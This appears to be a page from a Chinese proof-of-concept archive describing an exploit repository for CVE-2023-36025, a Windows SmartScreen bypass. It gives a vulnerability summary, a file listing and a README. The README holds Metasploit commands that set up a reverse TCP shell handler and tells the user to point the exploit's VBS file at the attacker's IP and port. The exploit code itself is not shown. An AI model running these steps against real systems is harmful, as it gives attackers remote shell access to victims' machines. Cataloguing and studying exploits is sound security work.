支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%

POC详情: edf9086138e8b36096459ddee7a40689b1894e30

来源
关联漏洞
标题:Microsoft Windows SmartScreen 安全漏洞 (CVE-2023-36025)
Description:Microsoft Windows是美国微软(Microsoft)公司的一套个人设备使用的操作系统。 Microsoft Windows SmartScreen存在安全漏洞。攻击者利用该漏洞可以绕过某些功能。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows 10 Version 1809 for ARM64-based Systems,Wi
Description
Windows SmartScreen Security Feature Bypass Vulnerability
介绍
# [EXPLOIT] CVE-2023-36025 - Description
Windows SmartScreen Security Feature Bypass Vulnerability

# Usage
- NOTE handler waiting for tcp request for target
- P.S configure CVE-2023-36025.vbs file to change the ip and port to machine ip and port that is being used for the TCP handler 
- configure reverse TCP handler
  msfconsole 
  use exploit/multi/handler 
  set payload windows/shell_reverse_tcp
  set LHOST <MACHINE IP>
  set LPORT <MACHINE PORT>
  run

文件快照

[4.0K] /data/pocs/edf9086138e8b36096459ddee7a40689b1894e30 ├── [ 57] CVE-2023-36025.url ├── [ 754] CVE-2023-36025.vbs └── [ 461] README.md 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。